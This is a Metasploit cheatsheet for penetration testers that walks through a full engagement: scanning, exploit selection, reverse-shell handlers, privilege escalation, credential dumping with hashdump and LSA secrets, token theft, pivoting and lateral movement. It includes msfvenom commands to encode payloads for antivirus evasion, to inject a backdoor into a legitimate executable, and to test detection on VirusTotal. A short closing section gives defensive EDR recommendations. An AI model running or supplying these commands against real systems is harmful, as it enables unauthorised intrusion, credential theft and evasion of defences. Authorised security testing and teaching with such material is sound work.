π‘οΈ Methodology Checklist
- Start MSF with DB:
msfdb run - Set workspace:
workspace -a [NAME] - Import Nmap scan:
db_import [FILE].xml - Find relevant module:
search type:exploit name:[SERVICE] - Set required options:
use [MODULE],set RHOSTS,set LHOST/LPORT - Verify target is exploitable:
check - Execute:
exploit -j(background job) orrun - Migrate to stable process after Meterpreter shell
π― Operational Context
Use when: Need quick MSF command reference during active exploitation β session management, module search, handler setup, and meterpreter commands.
Think Dumber First: search before use. options before run. sessions -l to see what you have. Donβt start new exploit modules while existing sessions are unmanaged.
Skip when: N/A β reference document for active MSF use.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo systemctl start postgresql && sudo msfdb run | Start DB + launch MSF |
db_status | Verify DB connection |
workspace -a [NAME] | Create + switch workspace |
db_nmap -sV -sS [TARGET_IP] | Scan and auto-store results |
db_import [FILE].xml | Import external Nmap XML |
hosts -u | Show live hosts from DB |
services -p [PORT] | Filter services by port |
creds | List all stored credentials |
loot | List all captured files/hashes |
db_export -f xml backup.xml | Backup database |
search [KEYWORD] | Search modules by keyword |
search type:exploit name:[NAME] | Filtered module search |
grep meterpreter grep reverse_tcp show payloads | Chain grep to filter payloads |
use [MODULE] | Select module by path or index |
show options | Display module settings |
set RHOSTS [TARGET_IP] | Set target |
set LHOST tun0 | Set attacker VPN IP |
set LPORT [PORT] | Set listener port |
set payload [PAYLOAD] | Set payload |
exploit | Run exploit |
exploit -j | Run as background job |
sessions -l | List sessions |
sessions -i [ID] | Interact with session |
background | Background current session |
jobs -l | List background jobs |
jobs -K | Kill all jobs (clear stuck listeners) |
use multi/handler | Generic listener for standalone payloads |
migrate [PID] | Move Meterpreter to stable/privileged process |
getsystem | Auto-escalate to SYSTEM |
steal_token [PID] | Impersonate process token |
hashdump | Dump SAM hashes (needs SYSTEM) |
lsa_dump_secrets | Dump LSA secrets |
portfwd add -l [LPORT] -p [RPORT] -r [TARGET_IP] | Port forward through session |
route add [NET] [MASK] [SESSION_ID] | Add pivot route |
use post/multi/recon/local_exploit_suggester | Find kernel privesc exploits |
use post/multi/manage/shell_to_meterpreter | Upgrade dumb shell to Meterpreter |
searchsploit -t [NAME] --exclude=".py" | Find Ruby MSF modules in exploit-db |
mkdir -p ~/.msf4/modules/exploits/[PATH]/ && cp [MOD].rb ~/.msf4/modules/exploits/[PATH]/ | Install custom module |
reload_all | Reload all modules after installing custom |
msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -f [FORMAT] -o [FILE] | Generate standalone payload |
msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -b "\x00" -f [FORMAT] | Remove bad chars from payload |
msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -e x86/shikata_ga_nai -i 10 -f exe -o shell.exe | Encode with SGN (10 iterations) |
msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -k -x [LEGIT].exe -f exe -o backdoor.exe | Inject into legitimate executable |
msf-virustotal -k [API_KEY] -f [FILE].exe | Check payload against VirusTotal |
π¬ Deep Dive & Workflow
Full Engagement Workflow
1. sudo msfdb run
2. workspace -a [ClientName]
3. db_nmap -sV -sS [TARGET]
4. hosts / services β review findings
5. search [vuln/service]
6. use [exploit]
7. set RHOSTS/LHOST/LPORT/payload
8. exploit
9. [In Meterpreter] getuid β ps β migrate β getsystem/steal_token
10. hashdump / lsa_dump_secrets
11. creds β use for lateral movement
12. db_export -f xml backup.xml
Staged vs Stageless Quick Reference
/ = staged: windows/x64/shell/reverse_tcp (two steps)
_ = stageless: windows/x64/shell_reverse_tcp (one file)
Common Payloads Quick Reference
| Target | Payload | Format |
|---|---|---|
| Windows CMD | windows/x64/shell_reverse_tcp | exe |
| Windows Meterpreter | windows/x64/meterpreter/reverse_tcp | exe |
| Windows IIS | windows/meterpreter/reverse_tcp | aspx |
| Linux Meterpreter | linux/x64/meterpreter/reverse_tcp | elf |
| PHP web | php/reverse_php | raw |
| Java Tomcat | java/jsp_shell_reverse_tcp | war |
Key Port Choices
| Port | Why |
|---|---|
| 443 | HTTPS β almost never blocked |
| 80 | HTTP |
| 4444 | MSF default β avoid in prod |
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Module search returns nothing | Wrong keyword | Try by CVE: search cve:2021-41773; or type: search type:exploit platform:windows smb |
| run/exploit returns βno session createdβ | Payload or network issue | Check handler is running: jobs -l; verify LHOST/LPORT match handler settings |
| Session dies immediately | Payload crash or AV kill | Use set ExitOnSession false; switch to HTTPS payload for AV evasion |
| Background session inaccessible | Session ID wrong | sessions -l to list; sessions -i [ID] to interact |
| Post module fails on session | Wrong session type | Verify: sessions -i [ID] β meterpreter vs shell sessions have different post module compatibility |
π Reporting Trigger
Finding Title: Metasploit Framework Used for Exploitation and Post-Exploitation Impact: MSF provides integrated exploit delivery, session management, and post-exploitation modules enabling rapid pivoting from initial access to full domain compromise. Root Cause: Exploitable service with no EDR capable of detecting Meterpreter session establishment or post-exploitation module execution. Recommendation: Deploy EDR with Meterpreter detection signatures. Implement network-level detection for MSF staging traffic. Alert on unusual LSASS access patterns indicative of MSF credential dumping modules.